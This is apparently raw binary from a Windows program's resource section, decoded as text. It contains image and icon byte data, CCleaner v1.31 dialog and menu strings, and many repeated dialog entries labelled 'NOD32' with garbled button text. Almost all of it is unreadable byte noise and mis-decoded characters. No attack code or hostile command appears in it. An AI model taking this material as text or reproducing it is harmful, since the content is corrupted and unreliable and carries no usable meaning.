[?�(�������ߏ�<��{;�Ob�o���4�[m�`~dH �H���ۊ�.���}�g�C?�6��� ��d`��*� d��>`��*C��@F]��y�c�h�`-�?������l�M Jg��y�C�o�	�.˯ ���ާ�,@���D ���4����H`��!�#bi�$ \��w�2hy �!��2��e(C�P�2��e(C�P�2��e(C�P�_�?�\9A�v    IEND�B`�PA(   0   `          �%                                                                                                                                                                                                                                                                                               " #" # "" #"" #"!
                                                                                                                             # #' #H! /l"!D�"!T�"!`�#"i�" l�" l�#!k�" b�"!W�" F�! /� #j #H #%"                                                                                                    ! #"! 3a#!b�$!��%!��% ��% ��%��% ��%��% ��%��% ��%��% ��%��% ��%!��$!��"!Q� &�"D #                                                                                     #"!L{$!��% ��% ��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��% ��%!��#!g� '� #8"                                                                            !! 6G$"��% ��% ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��% ��%��%!��"!G� #]"                                                                    ""!Pm% ��% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��#"f� #q #                                                            "#"^|% ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��% ��#"q� #p"                                                     "!Xm% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��#"d� #["                                                "!EF% ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��% ��"!E� #7                                        ! 1%!��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��%��$�� ����"��%��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��%!�� '� #                                    #$!�%��& ��%��& ��%��& ��%��& ��%��& ��%��%��$���� ��4��%J��@��Z�"��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��& ��%��#!h�"G                                "!K:% ��% ��& ��& ��& ��& ��& ��& ��% ��%��#����"�� 8��&O��,^��,_��,_��,_��*R��D���% ��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��%!�� )� #                            &$!��% ��%��& ��%��& ��%��%��#����&��"?��*X��.f��-c��-a��,`��,_��+^��,_��F���$En�  gXU$��% ��%��& ��%��& ��%��& ��%��& ��%��& ��%��% ��#!_� #5                            "!K(% ��% ��& ��% ��%��#����+��&I��/g��3r��1o��0k��/h��.e��-c��,a��,`��,_��<y��I���G���.J�  HV$��% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��%!�� #f                         $"��%��%��"���� 1��*T��5w��8���7~��5z��4v��3r��1n��0k��/h��2l��6s��@���M���M���J���G���A����  !�!% ��% ��%��& ��%��& ��%��& ��%��& ��%��% ��% ��! 4�"                    KJ[*'��$��$7��,]��9���=���<���;���:���8���6~��5z��5w��;~��C���M���T���X���S���U���T���K���H���C���-X��   i#�y% ��& ��& ��& ��& ��& ��& ��& ��& ��& ��% ��% ��#!_� #                    ��% ��2a��=���=���=���=���=���<���;���;���C���L���U���Y���Z���Y���W���V���T���O���R���P���H���D���@���4�   ,m% ��%��& ��%��& ��%��% ��%��% ��%��% ��$!��"!\<"                    ��U)3��<���=���=���=���=���@���J���T���\���[���Z���Y���X���V���T���R���Q���N���N���H���Q���K���C���@���2c��q!��% ��& ��% ��% ��% ��% ��$!��$!��#!f:A                                XV��-D��<���=���@���M���X���`���^���\���[���Y���W���U���S���Q���O���P���L���G���E���H���@���Q���E���@���@���722�   fR\%��% ��% ��$!��#!�q"!Y%<                                            +'��.8��M���b���i���`���]���[���Z���V���P���X���W���Q���O���N���I���H���P���E���?���?���A���;���O���?���I|��Vv��9_�N!��#!z[! M                                                            '$��2>��6H��Z���v���h���[���S���V���V���J���?���T���V���K���H���F���<���B���P���?���8{��=���;���9���G���oqy�I���:y�� �
                                                                    )%��7G��:M��8K��Eb��j���h���V���B���L���T���E���3���P���T���C���A���?���4z��?���K���<y��5x��<���=~��Y���bu��=���N���X3�   j                                                                   -*��>Q��AW��?T��<Q��<R��X���g���W���>���B���Q���D���2���J���R���>|��<w��;u��7u��N���Vt��bs��Zw��Q��@���>���<���c����\�7!�   P                                                               &#��bv��g��c{��_w��[r��Vm��Z}��c���W���E���=���N���C���4}��C���M���?s��aez�khr�Tv��P���@���<���9���G���Q���_�����[��l+��_��   5                                                           &$�ނ�������������������������������q���X���H���=���N���Zp��^p��eq��M���B���;���<���:���;���j����n4��^��a��t:�ʘf�ǖb��q+��X��                                                           &"�Ӂ��������������������������������������k���pps�gt��N���?���;���<���G���p�����]��s��u#��n��l��i��d��h ���L�Ҥq�Z��l �6#�                                                           &#��{�������������������������������������������dy��I���N���g���������q������R���D���+��{��u
��p��m��i��d��l'���U�ӥr���J�L0	�                                                           '%��r~������������������������������������������^k��,5��aH1�ǒl�ϡ�Ϡy�͜n�˖c�ǐS�9�����w	��r��n��m��h��d��p/���T���K�.u                                                           (&��dm������������������������������������������p���'%�� #`W,tҤ{�թ��Сv�̚i�ɓ\�ċE���)��{��t��p��n��m��g��b��X �T7x                                                            )+�aPU����������������������������������������������(%��""-�2)#�l.kРu�Ҥ|�Νn�ʖb�ƏQ���6����x��s��k��T�*�(U!!3� #l"J #, #!                                            &)�-66����������������������������������������������BF��%$]� #6    �m.aĎX�ʔ^���L��j2ˆV��a��w�w ��j��P�[0�O�&#��&"��%"��#"e�""D�  '~"[ #:" "                             v&#�땥������������������������������������������ky��'$��! %� #    eAmFB*            �bE�y%��y-��e��U�M,#�ALy�as��Vd��DL��34��'#��%"��$"v�#"U�"!4� #l #5                        '&��ox����������������������������������������������>A��&%l� #b #                            �iw�}3��|8��f��Z�O:/�HU��o���s���r���o���^p��MX��<@��+)��&#��!!-`                        ),�J@A����������������������������������������������}���.-��&%[� #h #                    I5!�\%�?�A��h��_�F88�O]��p���s���s���s���s���s���Yh��%#�� #*                             $�'$�ߌ�����������������������������������������������w���0/��'%{�""/� #V", #" #"+"!9d+&�ԣlF�ƆI�ĄF��j��a�>7A�Ue��q���s���r���s���r���8;��$#[�"	                                **�jJL������������������������������������������������������KQ��(%��&$��%$h�$#Y�$#Y�$"j�%"��*(��NZ��x����~H�ȊO�ņG��m��b�:;S�g|��s���s���s���`s��&"�� &7                                    #(�&#�؂�������������������������������������������������������}���_l��LT��CI��BH��JS��[j��p���s���s���}�����I�ɋQ��8��m�pQ8�cv��s���r���r���69��$#`�"	                                        *-�?20����������������������������������������������������������������������~���|���y���v���t���s���s��������w.��r��m�ugo�o���s���s���Sa��%#�� %%                                                )(��DE�������������������������������������������������������������������������}���y���w���t���s���s�������yj��|��p���r���s���ey��)&��""?W!                                                04�21��LN��������������������������������������������������������������������������}���{���x���u���s���s���s���s���s���s���k���//��$#^�#                                                        03�)(��BC�����������������������������������������������������������������������������|���y���w���t���s���r���s���i}��11��$#n� $
                                                                    ))�u/,��{���������������������������������������������������������������������������}���z���x���u���s���[k��+*��%$h� &                                                                            *,�2)&��@@��������������������������������������������������������������������������~���{���h{��>B��)&��((SM&                                                                                    !%�*+�S(&��31��af����������������������������������������������������������v���Yd��9;��/,��NL�~LKZ                                                                                                        15�,>=��,*��*'��<<��PT��^e��hq��lw��mx��kv��eo��[c��OU��?B��-+��'$��US�����Y���                                                                                                                            AD�	OR�7-.�Z)(�w,*��*(��$ ��%!��(&��*(��43�j12�H56t!!J                                                                                                                                                                                                                                                                ������  ��� ��  ��  �  ��  �  ��  �  ��   �  ��     �    ?  �      �      �      �      �      �      �      �      �      �      �      �    �  �   �  �   ?�  �   �  �   �  �   �  �   �  �   �  �   �  �   �  �   �  �    �  �     � �   � �   � �   �      �      �      �      �      �    ?  �      ��   �  ��  �  ��  �  ��  �  ��� ��  ������  (       @          �                                                                                                                                                                           $6! 5^! F}" P�! T�" S�! K�! =} ([ #7                                                                ! 2B" g�$!��% ��% ��% ��%��% ��% ��% ��%��% ��$!��# j�! 0w"#                                                    *"#!y�% ��%��%��%��%��%��%��%��%��%��%��%��%��%��% ��#!l� %W                                            !;;$ ��% ��& ��& ��%��& ��& ��& ��%��& ��& ��& ��%��& ��& ��& ��%��% ��$!�� ,r                                     :4% ��%��& ��& ��& ��%��& ��& ��& ��%��& ��& ��& ��%��& ��& ��& ��%��& ��% ��$!�� (c                            )$ ��% ��%��& ��& ��& ��%��& ��& ��& ��%��%��%��& ��%��& ��& ��& ��%��& ��& ��% ��#!|� #5                        $!��%��%��%��%��%��%��%��%��"��#��!7��&t���%��%��%��%��%��%��%��%��%��% ��! C�	                    I<% ��& ��& ��%��& ��%��"�� &��"<��'Q��,_��+^��0f��*^�y�%��% ��& ��& ��%��& ��& ��& ��%��$!�� #7                    $!��% ��% ��%��!��!,��&H��-a��0k��/g��-c��,`��,_��=z��C���
!�V;%��% ��& ��%��& ��& ��& ��%��% ��! 6�            #">% ��"��$3��+W��5x��8���6|��4v��2p��3p��:y��C���N���N���H���6k��R�H% ��& ��%��& ��& ��& ��%��% ��# g�            [Y�\*=��8���=���=���<���:���=���F���P���W���X���V���Q���R���I���C���3X�$��%��%��%��%��%��%��% ��#!s{            ^[��8}��=���=���E���P���X���[���Y���W���T���R���O���L���H���O���B���9t��kkc% ��%��% ��$ ��#!��S4'                    .,��A~��X���^���^���[���V���W���U���Q���N���J���L���A���C���@���H���D��B[}�g#��# wkC                                    **��7J��V��m���[���P���T���B���O���P���F���@���B���F���9|��=���;���]~��C���$,3�                                            13��?U��<Q��D`��a���U���A���N���;���I���H���=z��8v��G���Nv��Rz��P��K���=����b-��                                           :>��u���p���l���g~��m���X���A���H���A���R���Kt��Zm��P}��D���@���W���l��������|B��U�k                                       ?A�䓧����������������������e���^z��Y}��D���E���I���t�����a��y>��i��d��s2�͝j��@�P3�                                       89�ӗ���������������������������Vr��V��󇘫���x���n�ÊM���'��w��p��k��e��|@�˛g�kG�                                       ,+������������������������������T\��*&=��|P�թ��Ξq�ɔ]�;��|��r��n��j��e��b-�-D                                        ''������������������������������lz��$"b�D3#��O�ѣy�̘f�ċI��{ ��w��l�~D	�'�" X�!!9} #K"'                        "#�Tu������������������������������/.�� $PM7!�W%WsK]9#
)<&�m��w(��[�S.!�?G��HP��7;��'%��#!k�"!J�  *c #/            bOS������������������������������co��%#i� #5            L1	�r*ξ{6��`�YB6�^p��r���q���bu��Q]��57��#"O�                +*����������������������������������RZ��%#p�! (d"$#$7,Y��yE���?��e�QCD�dx��r���r���r���8;��  )0                    !$�2^c����������������������������������ix��<?��&$��$"y�$"��24��S`������L�ÂA��h�OOi�r���s���`q��$"r�                        *)����������������������������������������������u���v���w���t���s��������}8��o�qi~�r���q���46��  ,,                            f77�ў�����������������������������������������������}���x���u���s�����������q���s���HQ��#!Sl                                -0�76�Ԗ�����������������������������������������������~���z���v���s���s���r���NX��$"l�                                        q+*��ls��������������������������������������������������|���x���m���@F��$"gz                                                    &(�I22��ci������������������������������������������k{��JQ��?>��=<^5                                                                    24�,9:�z54��BD��MQ��TY��UZ��PV��HM��=?��-,��SQ�z���,OMQ                                                                                        QZNOA                                                    ����� ��  ?�  �  �  �  �  �  �  �  �  �  �  � ��  ��  �  �  �  ��  �  ���  �  �  �  �  �  �  �� ����(                 @                                      %,C1M)D$                             `}$ ��% ��%��% ��%��% ��# ��1R                $ ��% ��& ��& ��& ��& ��& ��& ��& ��% �� Br                "��%��& ��%��%��#&��  ��%��& ��%��& ��% ��#7        ;;% ��$��%-��(D��)V��,_��2c��k�%��& ��& ��% ��" i�        36��/[��6|��9���?���G���N���L���%I|���%��% ��%��$ ��    Ba��L���T���X���U���O���J���F���B���B�$ ��q{7-            4?��Qz��X���I���I���C���B���E|��M���Kp��/                    `l�����z���_���P���I���Z���i����xW���Y�eC�                   fp�☬����������J^�߮�~�ēb�� ��o��l�~Y/�                SZ��������������RZ��[D.K�wI�}T ��r�c8�36}�''b�9[$        '(�l����������������/0q�"U;.e�u2�mVP�n���fz��,-|�        .py�婺��������������[f��MW��\l�������v)�is��^o��06             !k=������������������������~���v���{���i~��*+h                    Z.\b�Ñ�������������������{���\h��-.gj                                R))*ze58��35��,.}w&%\K98@                �  �  �  �  �  �   �  �  �  �  �  �  �  �  �  �  (                 @                                      %,C1M)D$                             `}$ ��% ��%��% ��%��% ��# ��1R                $ ��% ��& ��& ��& ��& ��& ��& ��& ��% �� Br            %��$��% ��%��#��"��!��#��%��%��& ��% ��#7        ]j#��% ��% ��#����K:M.~m!��& ��& ��% ��" i�        %$��&"��&!��% �� ��0%�{%��% ��%��$ ��    )-��+/��('��&"��o�	        
>#$ ��q{7-            4?��?N��;E��03��!!c�            


        `l��q���m���Zj��)+d�                                        fp�☬����������7<q�                        SZ��������������MU��.$		@@17s�,1d�9[$        '(�l������������s���9=p� 4-*!$C8BL��at��bu��fz��,-|�        .py�婺����������u���T^��JS��Tb��h}��o���l���^o��06             !k=��������������������}���x���s���n���_q��*+h                    Z.\b�Ñ�������������������{���\h��-.gj                                R))*ze58��35��,.}w&%\K98@                �  �  �  �  �  �   ��  ��  ��  ��  �  �  �  �  �  �  (                 @                                                                                                              @q.R4(J|.2                                    Cq
1T=;i�"L��+^��+_��(Q��'@"                    *a�
BkEEr�,h��2v��0n��0k��7v��C���G���9_�"Ep            9~�3}��=���<���?���G���O���V���T���O���K���>}�� 5U            B��,G���P���X���X���W���R���M���K���D���D���B���6T��):(            `��Ek���S���O���D���O���B���>���@���9���E���Q���'/3�AA>	            V��`���I���F���>���E���Jo��O{��K���I���W����h+�(	x]F*                V��;Y���S���M���Q���}����S��f��j!�Ǖ`��X�G3                    \��s��y��}�ʗi�ČJ��{��o��h��s/��h0�W;	                            �~SXΝp�ǑX��{$�t��Y�I,k�W                                    ��I�s1    �r!��o$�l:�/	*                                                �k"�u,��v/�`8�D*                                                �_�|;λv(�6 |                                                    �Y�f�wI                                                                ��  �  �  �        �  �   �   �   �  �!  ��  ��  ��  ��  (                 @                          pO 8''8(#:)%:)&8'"5$'B,                                �w-���]��(���T���H��8���`��k�?%A                            �y2���Z��3���Q���M��<���\�ށ��P �>!C                        �h ��6����5��(��"�܋3��r��f ��N �?"C                    �z3���j��3���\���V��f ��i ��k ��n ��t�Y, �tF                �i#��2��"��F��5��f ��n�ق���F���f��i�4U                �y0���f�� ��p��y!��m��~�ܕ'���B���R�݄�n7�`5            �y2���V��!��t	��9��y��n	��y�څ�؅0�}G��Z                À8JՅ2��r��>���m��!��g��*���Y�� �D! �                        �x,H�,��1��G�߉&��g��.���\��(�J% �                            �w*E�+��~)��y!��l
��x�ߐ8��y�]0 �V1	K_:                        �|+�w#׀��1��}!�Z8O�`S�M�߃�\. �]9                            ��O���]���?�pI<�9���^���J��j
�=!T                            �3��3��p.V�w.ń1�F�ӈ8�a9l�T                                                    �`#                                                                        �?  �  �  �  �  �  �  �  �  �  �  �   �   �   ��  ��  (                 @                              Y;B* �[-                                                mBbՂ7��u+�M#
��e6                                        �k>�_���d��ӕ��B�N$��h9                                    ��K�}��?���i��ן��B�O$��h:                                    �tA�����<���n��٢��C�N$��c7                                    �zA�����>���t��٤��C�O$��i3                                    �|A�����A���y��ۨ��B�\!�U �L#]mH!                            �|A�����D���w���W���>���D���P��D�K2$                            �A������h���c���N���N���t��Д�s2�tQ0                            ��fi�Ά���p�˕H֌d3�w8���ؑd�R9"                            ��^Z�ԓ��o�sV1.        �~CޝP�H4"                            Ϥr&�٥��s�H0U            �l<�kA                                Ա���؜�͒Q�R9J                                                k��~t�œ�čU�O5'                                                        sZ>                                                                                ��  ��  ��  �  �?  �  �  �  �   �   �  �  �  �  ��  ��  (                 @                                                                                          bWK62./73/59505<725;725:605:5/583-52-'50+%5^SH                72,:�������������������������������������Բ�1-'5                85.:�������������������������޿���x���������2/)5                ?:3:�ܻ�������~��Ҥ��د����������޾��ҧ�����84-5                C>7:���������������������������������ڶ�����<815                C>8:����������������������������������������<825                C@::�����޼��ݺ��ܹ�������������������������<945                EA;:�����߾��޽��ݻ��ݺ���������������������>:55                D@;:����������������������������������������=:55                C@;:�����������������������������Ϧ���������<:55                @=8:�����������������������������ȓ��ݾ�����9725                >;6:���������������������������������Р�����7505                MLD!����������������������������������������FE>                                                                                                                                        ��  �  �  �  �  �  �  �  �  �  �  �  �  �  ��  ��      � C l e a n e r R u l e T r e e     ɯA n a l y z e     ʯC l e a n           ˯C h e c k   A l l     ̯U n c h e c k   A l l         � ͯR e s t o r e   D e f a u l t   PA    � C u s t o m S c r e e n     .�E d i t     /�M a n u a l   E d i t     � 0�R e m o v e   PA    � R e g i s t r y I s s u e     	�S e l e c t   A l l     
�S e l e c t   A l l   o f   T y p e           �D e s e l e c t   A l l     �D e s e l e c t   A l l   o f   T y p e           A�A d d   t o   E x c l u d e   l i s t     �O p e n   I n   R e g e d i t   � �S a v e   t o   t e x t   f i l e . . .       � S t a r t u p     "�D i s a b l e     #�E n a b l e         � $�D e l e t e   E n t r y       � R e g i s t r y I s s u e     �R u n   U n i n s t a l l e r     �R e n a m e   E n t r y     �D e l e t e   E n t r y         � �S a v e   t o   t e x t   f i l e . . .   PA    � V i r t u a l C l e a n e r     8�V i e w   d e t a i l e d   r e s u l t s           :�O p e n   c o n t a i n i n g   f o l d e r   � S o r t   b y     ?�T r e e   o r d e r     =�F i l e   s i z e   � >�F i l e   c o u n t   PA    � T r a y   I c o n     �& O p e n   C C l e a n e r . . .      �R u n   C C l e a n e r     �& C a n c e l           &�S h u t d o w n   a f t e r   C l e a n         � !�& E x i t   PA    � C l e a n e r R u l e T r e e     )�A n a l y z e     *�C l e a n           4�C h e c k   A l l     5�U n c h e c k   A l l         � 6�R e s t o r e   D e f a u l t   PA ��       @ �     ��     P i r i f o r m   C C l e a n e r    � T a h o m a             @ P ' 5 # �  ��� & C l e a n e r             @�P K 5 # �  ��� & R e g i s t r y                �P p 5 # �  ��� & T o o l s              �P � 5 # �  ��� & O p t i o n s               P � x  )  ��� O n l i n e   H e l p                P� � �  (  ��� C h e c k   f o r   u p d a t e s   n o w . . .                Po� (  \  ���               P  � | :  ���              @: $ @� �  ���              P  }" &  ���               @    @  ���      ��       P B     �       � T a h o m a             P ) � � ,  S y s T r e e V i e w 3 2                 P A } � �  S y s T a b C o n t r o l 3 2                 @ @ � � �  S y s T r e e V i e w 3 2               �H�  � � 4  ���               Px F � �  ���               P� P  �  ��� & A n a l y z e               PP  �  ��� R u n   C l e a n e r                 P� 
 � 
 �  m s c t l s _ p r o g r e s s 3 2        ��       @B     ��        � T a h o m a           �P
  >  �  ��� U n i n s t a l l                �P
 & >  �  ��� S t a r t u p                �P G >  �  ��� S t a r t u p                 @R # +� �  ���               P 
 F � �  ���               PR 
 +    ��� C a p t i o n . . .      ��       P B     m�        � T a h o m a             P ) � � �  S y s T r e e V i e w 3 2               �P�  � �   S y s L i s t V i e w 3 2                 P� � P    ��� S c a n   F o r   I s s u e s                 P� � P    ��� F i x   s e l e c t e d   i s s u e s . . .                P  q � �  S y s T a b C o n t r o l 3 2                 P� 
 � 
 �  m s c t l s _ p r o g r e s s 3 2        ��       @B
     ��        � T a h o m a            P  >  �  ��� S e t t i n g s               P
 & >  �  ��� C o o k i e s                 P
 = >  �  ��� C u s t o m               P	 S >  �  ��� E x c l u d e                 P
 j >  �  ��� A d v a n c e d               P � >  �  ��� U s e r s                 P
 � >  �  ��� A b o u t                 PR 
 +    ��� C a p t i o n                 @R # +� �  ���               P.  F � �  ���      ��       @ B     ��        � T a h o m a           �P  _�   S y s L i s t V i e w 3 2                 Ph F  �  ��� R u n   & U n i n s t a l l e r               Ph F  �  ��� R e n a m e   E n t r y               Ph6 F  �  ��� D e l e t e   E n t r y             � �PiO D  s  ���               Ph� F  �  ��� S a v e   t o   t e x t   f i l e . . .      ��       @ B     ��        � T a h o m a           �P  ��   S y s L i s t V i e w 3 2                 P � F  m  ��� E n a b l e               PZ � F  n  ��� D i s a b l e                 P� � F  �  ��� D e l e t e      ��       @ B     ��        � T a h o m a           !P7  �    ���              P
 # s
 	  ���   R u n   C C l e a n e r   w h e n   t h e   c o m p u t e r   s t a r t s              P
 1 u
 
  ��� A d d   " R u n   C l e a n e r "   o p t i o n   t o   R e c y c l e   B i n   c o n t e x t   m e n u              P
 ? o
   ��� A d d   " O p e n   C C l e a n e r . . . "   o p t i o n   t o   R e c y c l e   B i n   c o n t e x t   m e n u                P
 M x
   ��� A u t o m a t i c a l l y   c h e c k   f o r   u p d a t e s   t o   C C l e a n e r               	  PK _ 
   ��� N o r m a l   f i l e   d e l e t i o n   ( F a s t e r )               	  PK j 
   ��� S e c u r e   f i l e   d e l e t i o n   ( S l o w e r )               !PU t }    ���             �H�PP � + < n  S y s L i s t V i e w 3 2                P
 � s
   ��� W i p e   M F T   F r e e   S p a c e                 P
     -  ��� L a n g u a g e               P
 _ 9  .  ��� S e c u r e   D e l e t i o n                 P � D  o  ��� W i p e   F r e e   S p a c e   D r i v e s      ��       @ B	     � u        � T a h o m a           � �P  D  y  ���             � �P�  D  u  ���             �)�P / 0 (   ���               Ph )     ��� - >               Ph =     ��� < -             �)�P� . 0 (   ���              P $ _  $  ��� C o o k i e s   t o   D e l e t e                P� ! _  %  ��� C o o k i e s   t o   K e e p                 P h   A  ���      ��       @ B     ��        � T a h o m a          �-�P  N�   ���               @q F    ��� A d d   F o l d e r               @q F    ��� A d d   F i l e               Pw F    ��� A d d                 @q5 F    ��� A d d   R e g i s t r y               Pqf F    ��� E d i t               PrL F    ��� R e m o v e              P  g /  ��� C u s t o m   F i l e s   a n d   F o l d e r s   t o   C l e a n     PA ��       @ B     ��        � T a h o m a            P
 	 �
   ��� O n l y   d e l e t e   f i l e s   i n   W i n d o w s   T e m p   f o l d e r s   o l d e r   t h a n   4 8   h o u r s                P
  �
   ��� H i d e   w a r n i n g   m e s s a g e s                P
 % �
   ��� C l o s e   p r o g r a m   a f t e r   c l e a n i n g              P
 3 �
   ��� S h o w   p r o m p t   t o   b a c k u p   r e g i s t r y   i s s u e s                P	 _ ] 
 c  ��� M i n i m i z e   t o   S y s t e m   T r a y                P l d 
 C  ��� S a v e   a l l   s e t t i n g s   t o   I N I   f i l e                P � < 
 v  ��� J u m p l i s t   t a s k s      ��       @ @     ��        � T a h o m a            P  ) #   ���               P2 
 O 
 ?  ��� C C l e a n e r               P6  "    ��� v 1 . 3 1 . 3 2 5                 P6  k    ��� C o p y r i g h t   2 0 0 5 - 2 0 1 0   P i r i f o r m   L t d               P / � 0  ��� Y o u   c a n   d o w n l o a d   t h e   l a t e s t   v e r s i o n ,   r e p o r t   b u g s   a n d   s u b m i t   f e a t u r e   r e q u e s t e s   a t   t h e   f o l l w o i n g   w e b s i t e   : )                 P F d     ��� h t t p : / / w w w . c c l e a n e r . c o m                 P X � 1  ��� C o m m a n d - l i n e   p a r a m e t e r s :               P x z  z  ��� E n g l i s h   v e r s i o n   t r a n s l a t e d   b y   P i r i f o r m .     PA ��       @ B     ]�        � T a h o m a           !P  -� 3  ���      ��        � Ȁ     ?     D i a l o g    � T a h o m a           � P 	 � ! �  ��� P r o m p t :               � �P .  �  ���               @ + 	  �������              P�  2     ��� O K               P�  2     ��� C a n c e l      ��        @ �      �        � T a h o m a             P  �   I  ��� < <               P �   J  ��� > >               P; � 2  K  ��� F i x   I s s u e                 Po � V  L  ��� F i x   A l l   S e l e c t e d   I s s u e s                H� 4 D , |  ���               P� � 2  P  ��� C l o s e                P7  � , N  ���              P  2 , R  ���              P �   Q  ��� 2 / 1 9               @? a &  O  ��� I s s u e   F i x e d                 P q !  H  ��� s h a p e   l e f t              @� f 2     ��� O K               @� t 2  {  ��� C a n c e l               P�  3  �  ��� S t a g e     PA ��    �   @ ̆     N     D i a l o g    � T a h o m a            P�  2     ��� O K               P�  2     ��� C a n c e l             P  � : S  ���              P = � 
 R  ��� C h e c k 1      ��        � Ȁ     �     D i a l o g    � T a h o m a            P� � 2     ��� & C l o s e              P
 � � 
 T  ��� & R e s t a r t   C C l e a n e r               D�P
 7 � � �   ���               P
  � 	 V  ��� U n e x p e c t e d   E r r o r               P
  �  W  ��� A n   u n e x p e c t e d   e r r o r   h a s   o c c u r e d   i n   C C l e a n e r ,   t h e   a p p l i c a t i o n   m u s t   n o w   c l o s e .               @�    �   ��� ���               @� � 2     ��� & S e n d                 P  �  �������               P     �������               P      �  ���               P
 ) �  ������� E r r o r   D e s c r i p t i o n :               P
 � 2  b  ��� R e p o r t      ��       @ F     ��        � T a h o m a             P$  � Z �  S y s T a b C o n t r o l 3 2        ��       @ B     ��        � T a h o m a          �-�P $ N�   ���               @q F    ��� A d d   F o l d e r               @q F    ��� A d d   F i l e               Pw F    ��� A d d                 Pq5 F    ��� A d d   R e g i s t r y               Pqf F    ��� E d i t               PrM F    ��� R e m o v e              P  g /  ��� C u s t o m   F i l e s   a n d   F o l d e r s   t o   C l e a n     PA ��        � Ȁ     I3     R e g i s t r y    � T a h o m a           � �P6   `  ���               @ , 	  �������              X�  2     ��� O K               P 2     ��� C a n c e l             !P  -  _  ���      ��       @ B	     g�        � T a h o m a           	  P  
 f  ��� & C u r r e n t   u s e r   o n l y             	  P  + 
 e  ��� & A l l   u s e r s             	  P - 
 g  ��� & S e l e c t e d   u s e r s               �	�P p 0 ( j  ���               PJ r     ��� - >               PK �     ��� < -             �	�Ps n 0 ( k  ���              P D _  h  ��� U n s e l e c t e d   U s e r s              P� A _  i  ��� S e l e c t e d   U s e r s      ��       @ B     ��        � T a h o m a             PYB   r  ��� S t a t i c             !�P  ?� p  S y s L i s t V i e w 3 2                 Pg F    ��� R e m o v e      ��       P B     �       � T a h o m a           P� � F  w  ��� S w i t c h   V i e w               B !P� �   _  ���             �  P , v B 3  ���             %xP3� 7  t  S y s L i s t V i e w 3 2               �P� � >    S y s L i s t V i e w 3 2               �H�  � � 4  ���      ��        � Ȁ     �     E x c l u d e    � M S   S h e l l   D l g               P  � X G  ��� E x c l u d e               	 @  � 
 H  ��� A l l   D r i v e s             	  P  � 
 I  ��� D r i v e   o r   F o l d e r               ��P " �  E  ���               P� " 2  )  ��� B r o w s e             	  P 6 � 
 J  ��� F i l e             ��P D �  D  ���               P� D 2  (  ��� B r o w s e               P e � 1 @  ��� F i l e   T y p e s             	 P r � 
 A  ��� A l l   F i l e s               	  P � . 
 B  ��� F i l e   T y p e s :               � �XB � J  #  ���               P� � ;  K  ��� ( e . g .   * . z i p ; * . r a r )               P � �  F  ��� O p t i o n s                P � � 
   ��� R e c u r s e   S u b f o l d e r s              P� � 2     ��� O K               P� � 2     ��� C a n c e l      ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S   S h e l l   D l g              P� � 2     ���               P� 2     ��� B<5=0     ��        � Ȁ     <�     N O D 3 2    � M S  